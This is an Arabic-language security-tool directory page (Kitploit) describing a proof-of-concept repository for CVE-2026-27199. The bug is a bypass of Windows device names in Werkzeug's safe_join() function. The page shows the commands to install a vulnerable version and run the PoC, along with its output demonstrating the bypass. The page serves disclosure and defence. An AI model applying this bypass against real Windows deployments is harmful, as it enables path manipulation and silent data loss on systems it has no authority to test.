Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27199-werkzeug-safe-join-bypass-PoC — إثبات مفهوم لاستغلال CVE-2026-27199، وهو تجاوز لاسم جهاز Windows في دالة safe_join() الخاصة بـ Werkzeug، يوضح اجتياز المسار والتجاهل الصامت للبيانات. | Kitploit
أدوات/GitHubGitHub/alimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc
تحليل الثغرات الأمنيةالاستغلالأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubalimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc

CVE-2026-27199-werkzeug-safe-join-bypass-PoC

إثبات مفهوم لاستغلال CVE-2026-27199، وهو تجاوز لاسم جهاز Windows في دالة safe_join() الخاصة بـ Werkzeug، يوضح اجتياز المسار والتجاهل الصامت للبيانات.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-27199 PoC: تجاوز أسماء أجهزة Windows في safe_join() الخاصة بـ Werkzeug

الحالة: تم الكشف علنًا. تم إصلاحه في werkzeug 3.1.6.
الخطورة: متوسطة
المُبلّغ: @alimezar
النشرة الأمنية: GHSA-29vq-49wr-vm6x


الإصدارات المتأثرة

الحزمةالمتأثرةالمُصحّحة
werkzeug< 3.1.63.1.6

إثبات المفهوم

يتطلب: Windows، Python 3.8+، werkzeug < 3.1.6

root@kitploit:~
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py

المخرجات المتوقعة (الإصدار الثغري)

root@kitploit:~
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name          : nt

[+] safe_join(base, 'NUL')        -> None  (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (bypass!)

[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS — data silently discarded by device

[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
    Upgrade to werkzeug >= 3.1.6 to remediate.

المخرجات المتوقعة (الإصدار المُصحّح)

root@kitploit:~
[+] safe_join(base, 'subdir/NUL') -> None  (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.

المراجع

  • GHSA-29vq-49wr-vm6x — هذه النشرة
  • GHSA-hgf8-39gv-g3f2 — نشرة ذات صلة سابقة
  • GHSA-87hc-h4r5-73f7 — نشرة ذات صلة سابقة
  • سجل تغييرات Werkzeug

تم نشر إثبات المفهوم هذا لأغراض تعليمية ودفاعية بعد الإفصاح المسؤول وتوفّر التصحيح علنًا.

تنزيل الأداة